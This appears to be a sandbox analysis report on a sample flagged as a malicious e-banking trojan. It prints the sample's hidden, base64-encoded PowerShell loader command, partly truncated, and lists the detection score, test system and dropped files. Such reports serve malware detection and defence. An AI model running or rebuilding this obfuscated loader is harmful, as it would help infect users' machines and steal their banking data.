top title background image
flash

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAZwBRAG8AQwBXAGsAUwBlAHQATwBaADgAbQBLAEQATwBTAEEARQBrADQAUwBVAE0AbwB5AHcAWgBUAEEAeABGAGsAaQB5AHcAVwBuADcAMwAyADkAbABZADAAcQB2AHkAVgAxAG4ANwBqAEwARABSAEoAWgAyAFYANwB2AFAAUAByAHMAcgBpADQAaQBDAEoAWgBoAG4AaQB5ADUAMQBDAEMAbwA4AEUATQBZADkARwBxAEMATABYAE8ANgAwAFEAVQAyAEIAUABxAEoAUABTAHMANABOAEEAMQB2AEkAYgBiAG0AWQB6AG8AbQBZAHIAaABtADEAcAA5AGgAeABHAE8ARQBjAGYAYwAyAGQAOQBEAEgARABLADYAUwBlAFIAcABoAE4AVgA5AFEASgBmAFoASgBIAHkAWQBjAFUASgBFADcASQBpAEgAWgB5AGsAagB0AEoAdABzAEsAQQBZADUAZABNAEEAeQB5ADgAaQBFAHgAWABSAEMAeQBvAHcAKwBFAGkAZABWAHgAZAByAHgAdAAwAGgAYgAxAGcAOAB1AEYARABQAFcAUwBNAEIAQwBMADkATABqAGEASgBxAEgASgBPAFYAagBQAGYASQAxAHoAVgAwAEQAZgAwAHUAQwBDAE0ARgBHADUAbgBTADIASQBMADkAQgBXAGQAVABvAHQATgBuADgANgB3AHYAeABlAEwANgA5AGgAZQBRAEUARABWAHcASgBGAG4ASABXAHAAagBHAFUASABSAFcAdgB1AGUAVQBKAFUAdgBYAHgAUgB0AFgARABpAGYARgBQAFYATgBpAEgAMgB1AEsAbABiAE0AQgBWAGsAVgBIAGQAOQBYAE4AUABSAGQAawB4AGMATwA0AHoAVgBSAGwAYQA1AG4ATQA4AHEAcABLADQAcQBQAFgAbABDACsASwBOADQAbgAzAHYAYwBTADUANwB1AHAANwA0AHEAMgBqADIAeQArAHgAaABEAEgAMgAwAEYASwBxADYAbQBPAHEAcwBDAHkARAA5AGgAVQBVAHcAeQBWAFAAQgByAEwAKwA4AGEAVABDAGYAcAAwADgARwBZAFEAQgBzAEoAYgBrAGEASQBaAEMATQBMAG8AMgBpAEkAcwA4AG0AegBDAGkAeQAwAGMATwBEADQAWgBFAEIAZgBVAEYAQQA3AHAAQwArAGEASwBCAGsANAB3AEkAawBJAFcAbwBNAHcAWAAwAEkAdgBvAE0AMQBGAFAAZwA5AEQAMwA4ADIAQgAzAC8ATAB0ADIASgAyAHEAUABiAEQATgB3AGYAMQBkAEoAUABWAFkAQwBxAGIANQBnAFcAbgA3AFAAaQBkACsAQgBvADUAdgB3AEoAagBVAEgANABmAHoAaQAvAFIARwA1AE4AUABqADcAaABXAEIAYQA3AG4AdgB1AEYAYQBvADYAeABDAGQAegBMAE0AaABVAEEATAA1AEgAWABNADIAZABuAEkAeQBUAEoAWQBGADQAMQBEADcAbABYAHEATAAzAEUAWgBYAHkAcQBBAHQATwBZAEUARgBaAEwATgBNADUAWgBDAEgAUgBKAGoALwB5AGsAMQA2AGIAYQBmAEwAOABtADQAYgBPAE0ANgAyADkAVABwAHEAZQAxAEkAKwBQAGEAUAB4AEEAUABXAGUAUwBPADkARg... (truncated)

Status: finished
Submission Time: 2020-09-26 14:59:11 +02:00
Malicious
E-Banking Trojan
Evader

Comments

Tags

Details

  • Analysis ID:
    290370
  • API (Web) ID:
    475840
  • Analysis Started:
    2020-09-26 14:59:12 +02:00
  • Analysis Finished:
    2020-09-26 15:01:18 +02:00
  • Technologies:

Joe Sandbox

Engine Download Report Detection Info
malicious
Score: 68
System: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01

Dropped files

Name File Type Hashes Detection
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
#